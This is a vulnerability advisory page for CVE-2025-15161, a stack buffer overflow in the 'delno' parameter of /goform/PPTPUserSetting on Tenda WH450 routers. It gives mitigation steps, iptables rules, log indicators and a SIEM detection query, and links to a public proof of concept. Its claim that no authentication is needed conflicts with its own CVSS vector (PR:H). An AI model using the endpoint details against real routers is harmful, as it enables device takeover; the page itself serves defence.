CVE-2025-15161 – A stack-based buffer overflow vulnerability in ... (How to Fix)

📋 TL;DR

A stack-based buffer overflow vulnerability in Tenda WH450 routers allows remote attackers to execute arbitrary code by manipulating the 'delno' parameter in the /goform/PPTPUserSetting endpoint. This affects Tenda WH450 routers running firmware version 1.0.0.18. Attackers can exploit this without authentication to potentially take full control of affected devices.

💻 Affected Systems

Products:

Tenda WH450

Versions: 1.0.0.18

Operating Systems: Embedded router firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the web management interface, typically accessible on port 80/443. No special configuration required for exploitation.

📦 What is this software?

Wh450 Firmware by Tenda

View all CVEs affecting Wh450 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution leading to complete device compromise, credential theft, lateral movement into internal networks, and persistent backdoor installation.

🟠

Likely Case

Remote code execution allowing attackers to modify router settings, intercept network traffic, or use the device as a pivot point for further attacks.

🟢

If Mitigated

Denial of service or limited information disclosure if exploit fails to achieve code execution.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public proof-of-concept available on GitHub. Remote exploitation requires no authentication. Simple HTTP request manipulation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.tenda.com.cn/

Restart Required: Yes

Instructions:

1. Check Tenda website for firmware updates
2. Download latest firmware for WH450
3. Log into router admin interface
4. Navigate to System Tools > Firmware Upgrade
5. Upload and apply new firmware
6. Reboot router after update

🔧 Temporary Workarounds

Disable Remote Management

all

Prevent external access to router web interface

Login to router admin > System Tools > Remote Management > Disable

Network Segmentation

linux

Isolate router management interface to trusted network

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_NET -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_NET -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Replace affected Tenda WH450 routers with different models or brands
Implement strict network access controls to limit exposure of router management interface

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface under System Status or System Tools > Firmware Upgrade

Check Version:

curl -s http://router-ip/ | grep -i 'firmware' or check web interface

Verify Fix Applied:

Verify firmware version is no longer 1.0.0.18 and test if /goform/PPTPUserSetting endpoint still accepts malformed delno parameter

📡 Detection & Monitoring

Log Indicators:

HTTP POST requests to /goform/PPTPUserSetting with unusually long delno parameter
Router crash/reboot logs
Unusual process execution in router logs

Network Indicators:

HTTP traffic to router IP on port 80/443 containing 'delno=' with long strings
Sudden changes in router configuration

SIEM Query:

source="router_logs" AND (uri="/goform/PPTPUserSetting" AND (param="delno" AND length>100))

📊 Metadata

CVE ID: CVE-2025-15161

CVSS v3 Score: 7.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-119

EPSS Score: 0.14% exploit probability (34th percentile)

Published: December 28, 2025

Last Updated: February 24, 2026

🔗 References

https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPUserSetting/PPTPUserSetting.md Exploit,Third Party Advisory
https://vuldb.com/?ctiid.338536 Permissions Required,VDB Entry
https://vuldb.com/?id.338536 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.720887 Third Party Advisory,VDB Entry
https://www.tenda.com.cn/ Product

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-15161, you might also want to check these: